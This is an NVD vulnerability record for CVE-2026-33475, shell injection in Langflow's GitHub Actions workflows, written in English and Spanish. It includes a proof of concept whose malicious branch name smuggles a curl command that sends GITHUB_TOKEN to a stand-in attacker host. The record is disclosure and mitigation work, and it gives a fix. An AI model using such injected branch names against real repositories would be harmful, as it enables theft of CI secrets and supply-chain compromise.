{"resultsPerPage":1,"startIndex":0,"totalResults":1,"format":"NVD_CVE","version":"2.0","timestamp":"2026-04-17T12:52:13.706","vulnerabilities":[{"cve":{"id":"CVE-2026-33475","sourceIdentifier":"security-advisories@github.com","published":"2026-03-24T13:16:04.030","lastModified":"2026-03-24T19:13:01.250","vulnStatus":"Analyzed","cveTags":[],"descriptions":[{"lang":"en","value":"Langflow is a tool for building and deploying AI-powered agents and workflows. An unauthenticated remote shell injection vulnerability exists in multiple GitHub Actions workflows in the Langflow repository prior to version 1.9.0. Unsanitized interpolation of GitHub context variables (e.g., `${{ github.head_ref }}`) in `run:` steps allows attackers to inject and execute arbitrary shell commands via a malicious branch name or pull request title. This can lead to secret exfiltration (e.g., `GITHUB_TOKEN`), infrastructure manipulation, or supply chain compromise during CI/CD execution. Version 1.9.0 patches the vulnerability.\n\n---\n\n### Details\n\nSeveral workflows in `.github/workflows/` and `.github/actions/` reference GitHub context variables directly in `run:` shell commands, such as:\n\n```yaml\nrun: |\n  validate_branch_name \"${{ github.event.pull_request.head.ref }}\"\n```\n\nOr:\n\n```yaml\nrun: npx playwright install ${{ inputs.browsers }} --with-deps\n```\n\nSince `github.head_ref`, `github.event.pull_request.title`, and custom `inputs.*` may contain **user-controlled values**, they must be treated as **untrusted input**. Direct interpolation without proper quoting or sanitization leads to shell command injection.\n\n---\n\n### PoC\n\n1. **Fork** the Langflow repository\n2. **Create a new branch** with the name:\n   ```bash\n   injection-test && curl https://attacker.site/exfil?token=$GITHUB_TOKEN\n   ```\n3. **Open a Pull Request** to the main branch from the new branch\n4. GitHub Actions will run the affected workflow (e.g., `deploy-docs-draft.yml`)\n5. The `run:` step containing:\n   ```yaml\n   echo \"Branch: ${{ github.head_ref }}\"\n   ```\n   Will execute:\n   ```bash\n   echo \"Branch: injection-test\"\n   curl https://attacker.site/exfil?token=$GITHUB_TOKEN\n   ```\n\n6. The attacker receives the CI secret via the exfil URL.\n\n---\n\n### Impact\n\n- **Type:** Shell Injection / Remote Code Execution in CI\n- **Scope:** Any public Langflow fork with GitHub Actions enabled\n- **Impact:** Full access to CI secrets (e.g., `GITHUB_TOKEN`), possibility to push malicious tags or images, tamper with releases, or leak sensitive infrastructure data\n\n---\n\n### Suggested Fix\n\nRefactor affected workflows to **use environment variables** and wrap them in **double quotes**:\n\n```yaml\nenv:\n  BRANCH_NAME: ${{ github.head_ref }}\nrun: |\n  echo \"Branch is: \\\"$BRANCH_NAME\\\"\"\n```\n\nAvoid direct `${{ ... }}` interpolation inside `run:` for any user-controlled value.\n\n---\n\n### Affected Files (Langflow `1.3.4`)\n\n- `.github/actions/install-playwright/action.yml`\n- `.github/workflows/deploy-docs-draft.yml`\n- `.github/workflows/docker-build.yml`\n- `.github/workflows/release_nightly.yml`\n- `.github/workflows/python_test.yml`\n- `.github/workflows/typescript_test.yml`"},{"lang":"es","value":"Langflow es una herramienta para construir y desplegar agentes y flujos de trabajo impulsados por IA. Una vulnerabilidad de inyección de shell remota no autenticada existe en múltiples flujos de trabajo de GitHub Actions en el repositorio de Langflow antes de la versión 1.9.0. La interpolación no saneada de variables de contexto de GitHub (por ejemplo, `${{ github.head_ref }}`) en los pasos `run:` permite a los atacantes inyectar y ejecutar comandos de shell arbitrarios a través de un nombre de rama o título de solicitud de extracción malicioso. Esto puede llevar a la exfiltración de secretos (por ejemplo, `GITHUB_TOKEN`), manipulación de infraestructura o compromiso de la cadena de suministro durante la ejecución de CI/CD. La versión 1.9.0 parchea la vulnerabilidad.\n\n---\n\n### Detalles\n\nVarios flujos de trabajo en `.github/workflows/` y `.github/actions/` referencian variables de contexto de GitHub directamente en comandos de shell `run:`, como:\n\n```yaml\nrun: |\n  validate_branch_name \"${{ github.event.pull_request.head.ref }}\"\n```\n\nO:\n\n```yaml\nrun: npx playwright install ${{ inputs.browsers }} --with-deps\n```\n\nDado que `github.head_ref`, `github.event.pull_request.title` y `inputs.*` personalizados pueden contener valores controlados por el usuario, deben tratarse como entrada no confiable. La interpolación directa sin el entrecomillado o saneamiento adecuados conduce a la inyección de comandos de shell.\n\n---\n\n### PoC\n\n1. Bifurcar el repositorio de Langflow\n2. Crear una nueva rama con el nombre:\n   ```bash\n   injection-test && curl https://attacker.site/exfil?token=$GITHUB_TOKEN\n   ```\n3. Abrir una solicitud de extracción a la rama principal desde la nueva rama\n4. GitHub Actions ejecutará el flujo de trabajo afectado (por ejemplo, `deploy-docs-draft.yml`)\n5. El paso `run:` que contiene:\n   ```yaml\n   echo \"Branch: ${{ github.head_ref }}\"\n   ```\n   Ejecutará:\n   ```bash\n   echo \"Branch: injection-test\"\n   curl https://attacker.site/exfil?token=$GITHUB_TOKEN\n   ```\n\n6. El atacante recibe el secreto de CI a través de la URL de exfiltración.\n\n---\n\n### Impacto\n\n- Tipo: Inyección de Shell / Ejecución Remota de Código en CI\n- Alcance: Cualquier bifurcación pública de Langflow con GitHub Actions habilitado\n- Impacto: Acceso total a secretos de CI (por ejemplo, `GITHUB_TOKEN`), posibilidad de subir etiquetas o imágenes maliciosas, manipular lanzamientos o filtrar datos de infraestructura sensibles\n\n---\n\n### Solución Sugerida\n\nRefactorizar los flujos de trabajo afectados para usar variables de entorno y envolverlas en comillas dobles:\n\n```yaml\nenv:\n  BRANCH_NAME: ${{ github.head_ref }}\nrun: |\n  echo \"Branch is: \\\"$BRANCH_NAME\\\"\"\n```\n\nEvitar la interpolación directa `${{ ... }}` dentro de `run:` para cualquier valor controlado por el usuario.\n\n---\n\n### Archivos Afectados (Langflow `1.3.4`)\n\n- `.github/actions/install-playwright/action.yml`\n- `.github/workflows/deploy-docs-draft.yml`\n- `.github/workflows/docker-build.yml`\n- `.github/workflows/release_nightly.yml`\n- `.github/workflows/python_test.yml`\n- `.github/workflows/typescript_test.yml`"}],"metrics":{"cvssMetricV31":[{"source":"security-advisories@github.com","type":"Secondary","cvssData":{"version":"3.1","vectorString":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N","baseScore":9.1,"baseSeverity":"CRITICAL","attackVector":"NETWORK","attackComplexity":"LOW","privilegesRequired":"NONE","userInteraction":"NONE","scope":"UNCHANGED","confidentialityImpact":"HIGH","integrityImpact":"HIGH","availabilityImpact":"NONE"},"exploitabilityScore":3.9,"impactScore":5.2}]},"weaknesses":[{"source":"security-advisories@github.com","type":"Primary","description":[{"lang":"en","value":"CWE-74"},{"lang":"en","value":"CWE-78"}]}],"configurations":[{"nodes":[{"operator":"OR","negate":false,"cpeMatch":[{"vulnerable":true,"criteria":"cpe:2.3:a:langflow:langflow:*:*:*:*:*:*:*:*","versionEndExcluding":"1.9.0","matchCriteriaId":"D51A889E-5C89-4A92-B32B-C91EAF735430"}]}]}],"references":[{"url":"https://github.com/langflow-ai/langflow/security/advisories/GHSA-87cc-65ph-2j4w","source":"security-advisories@github.com","tags":["Exploit","Mitigation","Vendor Advisory"]}]}}]}